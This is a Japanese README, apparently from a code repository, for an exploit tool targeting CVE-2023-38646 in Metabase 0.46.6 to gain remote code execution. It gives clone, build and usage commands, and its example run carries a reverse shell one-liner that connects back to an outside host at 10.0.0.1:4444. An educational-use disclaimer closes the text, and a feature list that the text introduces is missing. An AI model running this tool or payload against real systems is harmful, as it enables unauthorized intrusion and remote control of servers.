
CVE-2023-38646 の Metabase 0.46.6 向けエクスプロイト。細工したリクエストとセットアップトークンの取得を介して、リモートコード実行を可能にします。
CVE-2023-38646 Metabase 0.46.6 エクスプロイト
このツールは、ソフトウェアプラットフォームの脆弱性(CVE-2023-38646)を悪用します。このエクスプロイトは、不正に処理されたデータベース接続文字列を利用し、細工されたリクエストを介してリモートコード実行を可能にします。
このツールは:
リポジトリをクローンします:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: スキャンおよび悪用対象となるプラットフォームのURL。 COMMAND: ターゲット上で実行するコマンド。 PROXY_URL (任意): プロキシサーバーのURL(例: http://127.0.0.1:8080)。指定しない場合、プロキシは使用されません。
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
このツールは教育および研究目的のみを意図しています。ターゲットをスキャンまたは悪用する前に、必ず適切な許可を得てください。このツールの誤用は開発者の意図に反し、違法となる可能性があります。
フィードバック、バグ、機能リクエストについては、お気軽にIssueを開いてください。プルリクエストはいつでも歓迎します!